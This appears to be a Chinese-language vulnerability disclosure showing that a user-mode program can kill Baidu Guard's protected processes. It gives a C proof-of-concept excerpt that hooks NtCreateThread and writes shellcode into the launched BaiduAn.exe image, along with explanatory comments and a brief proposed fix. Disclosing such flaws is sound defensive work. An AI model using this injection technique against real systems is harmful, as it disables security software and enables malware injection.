在开启百度卫士全防御的环境下，普通用户态程序即可杀掉百度卫士的所有守护进程。
1.触发exp:
2.exp运行后:
3.恶意程序轻易注入explorer:
/*
 * PoC fragment as published in the disclosure (an excerpt, not a complete
 * translation unit). NewCreateThread is installed as a detour on
 * ntdll!NtCreateThread in the calling process via DetourProc; BaiduAn.exe is
 * then started with CreateProcess. When the hook runs it uses the handle in
 * p4 to change page protection and write shellCode at the fixed address
 * 0x4027EF, then forwards the call through fnCreateThread.
 *
 * Names used but not declared in this excerpt: oldProtect, dwWrite,
 * shellCode, lRes, fnCreateThread, DetourProc. The statements after the
 * function (lpszProcess, pi, si, DetourProc, CreateProcess) must belong to an
 * enclosing function whose start and end lie outside this excerpt
 * (`si.cb = ...` is not valid at file scope).
 *
 * NOTE(review): p4 is assumed to be the target process handle — that is
 * inferred only from how p4 is passed to VirtualProtectEx and
 * WriteProcessMemory; the parameter layout of the hooked function is not
 * documented here. None of the VirtualProtectEx, WriteProcessMemory or
 * CreateProcess return values are checked.
 *
 * Defensive reading: what the product fails to stop here is a plain user-mode
 * parent using its child-process handle for a cross-process
 * VirtualProtectEx + WriteProcessMemory into the protected executable's
 * image. That cross-process write into a self-protected process is the
 * observable behaviour a self-protection / tamper-protection layer needs to
 * deny (cf. the proposed fix: widen the self-protection coverage).
 */
LONG WINAPI NewCreateThread(PVOID p1, PVOID p2, PVOID p3, PVOID p4, PVOID p5, PVOID p6,PVOID p7,PVOID p8){
    // Modify the EXE image entry point (original comment, translated)
    VirtualProtectEx(p4, (LPVOID)0x4027EF, 0x400, PAGE_EXECUTE_READWRITE, &oldProtect);
    // The shellcode can be arbitrary code: end the guard processes, load a driver, inject ... (original comment, translated)
    WriteProcessMemory(p4, (LPVOID)0x4027EF, shellCode, sizeof(shellCode), &dwWrite);
    // Forward to the original NtCreateThread captured by DetourProc; lRes is declared elsewhere.
    return lRes = (fnCreateThread)(p1, p2, p3, p4, p5, p6,p7,p8);
}
/* Excerpt from an enclosing function not shown (see header comment). */
LPCTSTR lpszProcess = _T("C:\\Program Files\\Baidu\\BaiduAn\\4.0.0.4830\\BaiduAn.exe");
PROCESS_INFORMATION pi = { 0 };
STARTUPINFO si = { 0 };
si.cb = sizeof(STARTUPINFO);
// Detour ntdll!NtCreateThread in this process; the original is stored in fnCreateThread.
DetourProc((PVOID)GetProcAddress(GetModuleHandle(_T("ntdll")), "NtCreateThread"), (PVOID)NewCreateThread, (PVOID*)(&fnCreateThread));
// Launch the protected executable; the hook above fires during its creation. Return value not checked.
CreateProcess(lpszProcess, NULL, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi);
修复方案:
加强自保护的防御覆盖度
……